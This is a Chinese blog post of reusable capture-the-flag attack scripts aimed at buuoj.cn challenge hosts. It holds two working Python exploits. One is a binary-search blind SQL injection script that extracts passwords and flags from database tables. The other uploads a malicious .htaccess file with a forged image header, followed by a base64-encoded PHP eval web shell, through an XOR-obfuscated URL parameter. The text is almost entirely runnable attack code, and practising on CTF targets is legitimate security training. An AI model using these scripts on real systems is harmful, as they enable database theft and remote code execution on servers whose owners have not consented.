常用脚本

记录一下常用的一些脚本

SQL 二分盲注

import requests
from time import sleep

url = "http://8fd845b8-4242-4441-ab34-57c8386d5faf.node3.buuoj.cn/backend/content_detail.php"
proxies = {
    "http": "127.0.0.1:8080"
}
def attack(cur, mid=""):
    # payload = "if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,0)" % (cur, mid)
    # payload = " or length((select group_concat(password) from users))={}#".format(cur)
    # 一开始把#写成%23, 结果一直不对, 后面才想起python会自动编码...
    # payload = " or if(ascii(substr((select group_concat(password) from users),%d,1))>%d,1,0)#" % (cur, mid)
    # payload = "0^(ascii(substr(((select(group_concat(column_name))from(information_schema.columns)where(table_schema=database()))),%d,1))>%d)" % (cur, mid)
    payload = "0^(ascii(substr((select(group_concat(password))from(admin)),%d,1))>%d)" % (cur, mid)
    data = {
        "id": payload
    }
    res = requests.get(url, params=data, proxies=proxies)
    # print(res.text)
    if res.status_code == 429:
        print('too fast')
    if "content" in res.text:
        return True
    else:
        return False


def try_length():
    for i in range(1, 10):
        if attack(i):
            print(i)
            break
        sleep(0.02)

def main():
    flag = ""
    for i in range(1, 22):
        end = 127
        start = 31
        mid = (end + start) // 2
        while end > start:
            if attack(i, mid):
                start = mid + 1
            else:
                end = mid
            mid = (end + start) // 2
            sleep(0.02)
        flag += chr(mid)
        print(flag)

if __name__ == "__main__":
    # try_length()
    main()

SSTI 判断图

.htaccess 上传 getshell

import requests
import base64

url = r"http://2eab5f94-4cfd-41dc-ac5d-6cda977d7ce4.node3.buuoj.cn//?_=${%fe%fe%fe%fe^%a1%b9%bb%aa}{%fe}();&%fe=get_the_flag"

# SIZE_HEADER = b"#define width 1\n#define height 1\n\n"
SIZE_HEADER = b"\x00\x00\x8a\x39\x8a\x39"
htaccess = SIZE_HEADER + b"""
AddType application/x-httpd-php .cc
php_value auto_prepend_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_2c67ca1eaeadbdc1868d67003072b481/shell.cc"

"""
files = [
    ("file",(".htaccess", htaccess, "image/gif"))
]
proxy = {"http": "127.0.0.1:8080"}
res = requests.post(url, files=files, proxies=proxy).text
print(res)

shell = SIZE_HEADER + b"00" + base64.b64encode(b"<?php eval($_GET['cjm00n']);?>")
files = [
    ("file",("shell.cc", shell, "image/gif"))
]
proxy = {"http": "127.0.0.1:8080"}
res = requests.post(url, files=files, proxies=proxy).text
print(res)

作者: cjm00n
地址: https://cjm00n.top/CTF/useful-scripts.html
版权声明: 除特别说明外，所有文章均采用 CC BY 4.0 许可协议，转载请先取得同意。